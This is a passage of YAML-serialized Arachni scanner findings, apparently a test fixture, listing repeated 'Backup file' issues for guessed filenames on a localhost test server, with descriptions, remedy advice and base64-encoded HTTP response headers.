that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.tar.gz
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.tar.gz
injected: some_filename.tar.gz
id: some_filename.tar.gz
elem: path
remarks: {}
method: ''
response: some_filename.tar.gz
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.000
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.000
injected: some_filename.000
id: some_filename.000
elem: path
remarks: {}
method: ''
response: some_filename.000
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTc=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php~
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php~
injected: some_filename.php~
id: some_filename.php~
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: some_filename.php~
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename~
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename~
injected: some_filename~
id: some_filename~
elem: path
remarks: {}
method: ''
response: some_filename~
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTQ=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php~1
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php~1
injected: some_filename.php~1
id: some_filename.php~1
elem: path
remarks: {}
method: ''
response: some_filename.php~1
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTk=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename~1
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename~1
injected: some_filename~1
id: some_filename~1
elem: path
remarks: {}
method: ''
response: some_filename~1
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTU=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: true
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.temp
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.temp
injected: some_filename.php.temp
id: some_filename.php.temp
elem: path
remarks: {}
method: ''
response: some_filename.php.temp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.cs
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.cs
injected: some_filename.php.cs
id: some_filename.php.cs
elem: path
remarks: {}
method: ''
response: some_filename.php.cs
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.temp
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.temp
injected: some_filename.temp
id: some_filename.temp
elem: path
remarks: {}
method: ''
response: some_filename.temp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.save
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.save
injected: some_filename.save
id: some_filename.save
elem: path
remarks: {}
method: ''
response: some_filename.save
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.php.save
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.php.save
injected: some_filename.php.save
id: some_filename.php.save
elem: path
remarks: {}
method: ''
response: some_filename.php.save
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/some_filename.cs
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/some_filename.cs
injected: some_filename.cs
id: some_filename.cs
elem: path
remarks: {}
method: ''
response: some_filename.cs
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
